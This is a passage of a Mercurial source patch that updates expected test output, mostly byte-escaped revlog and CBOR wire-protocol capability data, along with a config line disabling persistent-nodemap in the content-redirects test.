+ b'\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00H\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x99/Gy\x02\x9a=\xf8\xd0fm\x00\xbb\x92OicN&A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\xb5/\xfd V\xfd\x01\x00b\xc5\x0e\x0f\xc0\xd1\x00\xfb\x0c\xb9\xca\xdf\xb2R\xba!\xf2\xf6\x1d\x80\xd5\x95Yc\xef9DaT\xcefcM\xf1\x12\t\x84\xf3\x1a\x04\x04N\\\'S\xf2\'\x8cz5\xc5\x9f\xfa\x18\xf3\x82W\x1a\x83Y\xe8\xf0\x00\x00\x00\x00\x00\x00H\x00\x00\x00\x00\x007\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\xa9\x88\xfbCX>\x87\x1d\x1e\xd5u\x0e\xe0t\xc6\xd8@\xbb\xbf\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+\x00\x00\x00+a\x009a38122997b3ac97be2a9aa2e556838341fdf2cc\n\x00\x00\x00\x00\x00\x7f\x00\x00\x00\x00\x00\x91\x00\x00\x01\x16\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xbcL\xdb}\x10{\xe2w\xaa\xdb"rC\xdf\xb3\xe0M\xd5,\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\xb5/\xfd \xccE\x04\x00bK\x1e\x17\xb0A0\xff\xff\x9b\xb5V\x99\x99\xfa\xb6\xae\xf5n),"\xf1\n\x02\xb5\x07\x82++\xd1]T\x1b3\xaa\x8e\x10+)R\xa6\\\x9a\x10\xab+\xb4\x8bB\x9f\x13U\xd4\x98\xbd\xde \x9a\xf4\xd1}[\xfb{,q\x14Kf\x06\x1e\x10\xd6\x17\xbbl\x90\x16\xb9\xb3\xd8\x07\xee\xfc\xa8\x8eI\x10]\x9c\x1ava\x054W\xad\xdf\xb3\x18\xee\xbdd\x15\xdf$\x85St\n\xde\xee?\x91\xa0\x83\x11\x08\xd8\x01\x80\x10B\x04\x00\x04S\x04B\xc7Tw\x9f\xb9,\x00\x00\x00\x00\x01\x10\x00\x00\x00\x00\x00<\x00\x00\x01\x16\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x90#\x1d\xdc\xa3o\xa1x\xa0\xee\xd9\x9b\xd00x\x11$\x87\xdd\xa3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe6\x00\x00\x01\x16\x00\x00\x000dir1/f\x0028c776ae08d0d55eb40648b401b90ff54448348e\n', (zstd !)
b'',
{
b'location': b'store',
b'path': b'00changelog.i',
- b'size': 527
+ b'size': 527 (no-zstd !)
+ b'size': 530 (zstd !)
},
- b'\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00?\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff3\x90\xef\x85\x00s\xfb\xc2\xf0\xdf\xff"D4,\x8e\x92)\x01:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u992f4779029a3df8d0666d00bb924f69634e2641\ntest\n0 0\na\nb\n\ncommit 0\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00>\x00\x00\x00=\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xffD2\xd86&\xe8\xa9\x86U\xf0b\xec\x1f*C\xb0\x7f\x7f\xbb\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ua988fb43583e871d1ed5750ee074c6d840bbbfc8\ntest\n0 0\na\n\ncommit 1\x00\x00\x00\x00\x00~\x00\x00\x00\x00\x00N\x00\x00\x00W\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xa4r\xd2\xea\x96U\x1a\x1e\xbb\x011-\xb2\xe6\xa7\x86\xd0F\x96o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xc5\xc1\t\xc0 \x0c\x05\xd0{\xa6p\x03cjI\xd71\xf9\x11<H\xa1u\x7fJ\xf1]\x9eyu\x98\xa2\xb0Z\x88jk0\x11\x95z\xa0\xdb\x11\\\x81S\xfc*\xb4\xe2]\xc4\x89\t\xe3\xe1\xec;\xfc\x95\x1c\xbbN\xe4\xf7\x9cc%\xf9\x00S#\x19\x13\x00\x00\x00\x00\x00\xcc\x00\x00\x00\x00\x00C\x00\x00\x00B\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x85kg{\x94a\x12i\xc5lW5[\x85\xf9\x95|\xfc\xc1\xb9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u90231ddca36fa178a0eed99bd03078112487dda3\ntest\n0 0\ndir1/f\n\ncommit 3',
+ b'\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00?\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff3\x90\xef\x85\x00s\xfb\xc2\xf0\xdf\xff"D4,\x8e\x92)\x01:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u992f4779029a3df8d0666d00bb924f69634e2641\ntest\n0 0\na\nb\n\ncommit 0\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00>\x00\x00\x00=\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xffD2\xd86&\xe8\xa9\x86U\xf0b\xec\x1f*C\xb0\x7f\x7f\xbb\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ua988fb43583e871d1ed5750ee074c6d840bbbfc8\ntest\n0 0\na\n\ncommit 1\x00\x00\x00\x00\x00~\x00\x00\x00\x00\x00N\x00\x00\x00W\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xa4r\xd2\xea\x96U\x1a\x1e\xbb\x011-\xb2\xe6\xa7\x86\xd0F\x96o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xc5\xc1\t\xc0 \x0c\x05\xd0{\xa6p\x03cjI\xd71\xf9\x11<H\xa1u\x7fJ\xf1]\x9eyu\x98\xa2\xb0Z\x88jk0\x11\x95z\xa0\xdb\x11\\\x81S\xfc*\xb4\xe2]\xc4\x89\t\xe3\xe1\xec;\xfc\x95\x1c\xbbN\xe4\xf7\x9cc%\xf9\x00S#\x19\x13\x00\x00\x00\x00\x00\xcc\x00\x00\x00\x00\x00C\x00\x00\x00B\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x85kg{\x94a\x12i\xc5lW5[\x85\xf9\x95|\xfc\xc1\xb9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u90231ddca36fa178a0eed99bd03078112487dda3\ntest\n0 0\ndir1/f\n\ncommit 3', (no-zstd !)
+ b'\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00?\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff3\x90\xef\x85\x00s\xfb\xc2\xf0\xdf\xff"D4,\x8e\x92)\x01:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u992f4779029a3df8d0666d00bb924f69634e2641\ntest\n0 0\na\nb\n\ncommit 0\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00>\x00\x00\x00=\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xffD2\xd86&\xe8\xa9\x86U\xf0b\xec\x1f*C\xb0\x7f\x7f\xbb\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ua988fb43583e871d1ed5750ee074c6d840bbbfc8\ntest\n0 0\na\n\ncommit 1\x00\x00\x00\x00\x00~\x00\x00\x00\x00\x00Q\x00\x00\x00W\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xa4r\xd2\xea\x96U\x1a\x1e\xbb\x011-\xb2\xe6\xa7\x86\xd0F\x96o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\xb5/\xfd WE\x02\x00r\x04\x0f\x14\x90\x01\x0e#\xf7h$;NQC%\xf8f\xd7\xb1\x81\x8d+\x01\x16+)5\xa8\x19\xdaA\xae\xe3\x00\xe9v\xe2l\x05v\x19\x11\xd4\xc1onK\xa2\x17c\xb4\xf3\xe7 z\x13\x8f\x1c\xf3j4\x03\x03\x00`\x06\x84\x8b\x1a\n\x14\x00\x00\x00\x00\x00\xcf\x00\x00\x00\x00\x00C\x00\x00\x00B\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x85kg{\x94a\x12i\xc5lW5[\x85\xf9\x95|\xfc\xc1\xb9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u90231ddca36fa178a0eed99bd03078112487dda3\ntest\n0 0\ndir1/f\n\ncommit 3', (zstd !)
b''
]
--- a/tests/test-wireproto-content-redirects.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-wireproto-content-redirects.t Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,10 @@
$ . $TESTDIR/wireprotohelpers.sh
+persistent-nodemap is not enabled by default. It is not relevant to this test, so disable it.
+
$ cat >> $HGRCPATH << EOF
+ > [format]
+ > use-persistent-nodemap = no
> [extensions]
> blackbox =
> [blackbox]
@@ -66,9 +70,9 @@
s> Server: testing stub value\r\n
s> Date: $HTTP_DATE$\r\n
s> Content-Type: application/mercurial-cbor\r\n
- s> Content-Length: 2308\r\n
+ s> Content-Length: 2289\r\n
s> \r\n
- s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x81\xa5DnameHtarget-aHprotocolDhttpKsnirequired\xf4Ktlsversions\x82C1.2C1.3Duris\x81Shttp://example.com/Nv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x81\xa5DnameHtarget-aHprotocolDhttpKsnirequired\xf4Ktlsversions\x82C1.2C1.3Duris\x81Shttp://example.com/Nv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
(remote redirect target target-a is compatible) (tls1.2 !)
(remote redirect target target-a requires unsupported TLS versions: 1.2, 1.3) (no-tls1.2 !)
sending capabilities command
@@ -396,9 +400,9 @@
s> Server: testing stub value\r\n
s> Date: $HTTP_DATE$\r\n
s> Content-Type: application/mercurial-cbor\r\n
- s> Content-Length: 2335\r\n
+ s> Content-Length: 2316\r\n
s> \r\n
- s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x82\xa3DnameHtarget-aHprotocolDhttpDuris\x81Shttp://example.com/\xa3DnameHtarget-bHprotocolGunknownDuris\x81Vunknown://example.com/Nv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x82\xa3DnameHtarget-aHprotocolDhttpDuris\x81Shttp://example.com/\xa3DnameHtarget-bHprotocolGunknownDuris\x81Vunknown://example.com/Nv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
(remote redirect target target-a is compatible)
(remote redirect target target-b uses unsupported protocol: unknown)
sending capabilities command
@@ -731,9 +735,9 @@
s> Server: testing stub value\r\n
s> Date: $HTTP_DATE$\r\n
s> Content-Type: application/mercurial-cbor\r\n
- s> Content-Length: 2295\r\n
+ s> Content-Length: 2276\r\n
s> \r\n
- s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x81\xa4DnameNtarget-bad-tlsHprotocolEhttpsKsnirequired\xf5Duris\x81Thttps://example.com/Nv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hr